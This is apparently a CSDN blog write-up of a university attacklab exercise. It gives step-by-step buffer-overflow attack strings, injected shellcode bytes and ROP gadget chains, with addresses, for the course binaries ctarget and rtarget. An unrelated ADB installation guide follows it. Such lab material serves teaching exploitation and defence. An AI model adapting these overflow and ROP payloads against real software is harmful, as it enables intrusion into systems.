南邮——计算机系统基础实验3:attacklab

ctarget


level1

(1)使用objdump -d ctarget > my_ctarget.txt导出汇编指令集文件。

(2)查找getbuf函数,确定缓冲区大小为0x18(24)字节。

(3)查找touch1函数地址,确定目标地址为0x401eae。

(4)构建攻击字符串“缓冲区填充字段+touch1地址”。

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

ae 1e 40 00 00 00 00 00#touch1


level2

(1)使用cat cookie.txt查看cookie参数。

0x1c0096e1

(2)使用nano inject.s编辑攻击指令。

                     move $0x1c0096e1,%edi#传递cookie参数

                     ret

                    PS:这里需要将cookie传入%edi。

(3)使用gcc -c inject.s汇编攻击指令,在objdump -d inject.o输出机器码。

(4)查找touch2函数地址。

(5)gdb ctarget调试程序,查找栈起始地址。

  I、set environment LD_PRELOAD=./printf.so设置环境。

  II、break getbuf设置断点。

  III、ni/si运行到传递参数位置。

  IV、x/80xb $rsp/p/x $rsp查看栈起始地址。

(6)构建攻击字符串。

bf e1 96 00 1c c3 00 00#攻击指令机器码

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

88 fb 63 55 00 00 00 00#栈起始地址

e2 1e 40 00 00 00 00 00#touch2地址


level3

(1)查找touch3函数地址。

(2)读取地址=0x5563fb88+0x18=0x5563fba0。

(3)使用nano inject2.s编辑攻击指令。

                       mov $0x5563fba0,%edi

                       ret

(4)汇编并输出攻击指令的机器码。

(5)构建攻击字符串。

bf a0 fb 63 55 c3 00 00#攻击指令

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

88 fb 63 55 00 00 00 00#栈起始地址

ff 1f 40 00 00 00 00 00#touch3地址

31 63 30 30 39 36 65 31#cookie的十六进制表示

00 00 00 00 00 00 00 00#字符串结尾\0且字节对齐


rtarget

     ROP技术使用已有的汇编指令节构建自己的攻击指令。

     PS:使用objdump -d rtarget>my_rtarget.txt导出rtarget的汇编指令文件。


 level2

(1)构建攻击指令文件inject3.s,然后汇编和反编译获取机器码。

(2)在rtarget中查找攻击指令节。

       I、58:4020ca

       II、48 89 c7:4020bf

(3)构建攻击字符串。

00 00 00 00 00 00 00 00#缓冲区填充字段

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

ca 20 40 00 00 00 00 00#pop %rax

e1 96 00 1c 00 00 00 00#cookie

bf 20 40 00 00 00 00 00#mov %rax,%rdi

e2 1e 40 00 00 00 00 00#touch2地址


level3

(1)构建攻击指令文件inject4.s,然后汇编和反编译获取机器码。

(2)在rtarget中查找攻击指令节。

I、58:4020ca

II、89 c2:402171

III、89 d1:4021df

IV、89 ce:402234

V、48 89 e0:402132

VI、48 89 c7:4020bf

VII、48 8d 04 37:402111

VIII、48 89 c7:4020bf

(3)构建攻击字符串。

00 00 00 00 00 00 00 00#缓冲区填充字段

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

ca 20 40 00 00 00 00 00#pop %rax

20 00 00 00 00 00 00 00#0x18+0x8偏移量

71 21 40 00 00 00 00 00#mov %eax,%edx

df 21 40 00 00 00 00 00#mov %edx,%ecx

34 22 40 00 00 00 00 00#mov %ecx,%esi

32 21 40 00 00 00 00 00#mov %rsp,%rax

bf 20 40 00 00 00 00 00#mov %rax,%rdi

11 21 40 00 00 00 00 00#lea (%rdi,%rsi,1),%rax

bf 20 40 00 00 00 00 00#mov %rax,%rdi

ff 1f 40 00 00 00 00 00#touch3地址

31 63 30 30 39 36 65 31#cookie字符串十六进制

00 00 00 00 00 00 00 00#字符串以\0结尾且字节对齐

为了在Windows安装ADB工具,你可以按照以下步骤进行操作: 1. 首先,下载ADB工具包并解压缩到你自定义的安装目录。你可以选择将其解压缩到任何你喜欢的位置。 2. 打开运行窗口,可以通过按下Win+R键来快速打开。在运行窗口中输入"sysdm.cpl"并按下回车键。 3. 在系统属性窗口中,选择"高级"选项卡,然后点击"环境变量"按钮。 4. 在环境变量窗口中,选择"系统变量"部分,并找到名为"Path"的变量。点击"编辑"按钮。 5. 在编辑环境变量窗口中,点击"新建"按钮,并将ADB工具的安装路径添加到新建的路径中。确保路径正确无误后,点击"确定"按钮。 6. 返回到桌面,打开命令提示符窗口。你可以通过按下Win+R键,然后输入"cmd"并按下回车键来快速打开命令提示符窗口。 7. 在命令提示符窗口中,输入"adb version"命令来验证ADB工具是否成功安装。如果显示版本信息,则表示安装成功。 这样,你就成功在Windows安装ADB工具。你可以使用ADB工具来执行各种操作,如枚举设备、进入/退出ADB终端、文件传输、运行命令、查看系统日志等。具体的操作方法可以参考ADB工具的官方文档或其他相关教程。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [windows环境安装adb驱动](https://blog.csdn.net/zx54633089/article/details/128533343)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Windows安装使用ADB简单易懂教程](https://blog.csdn.net/m0_37777700/article/details/129836351)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值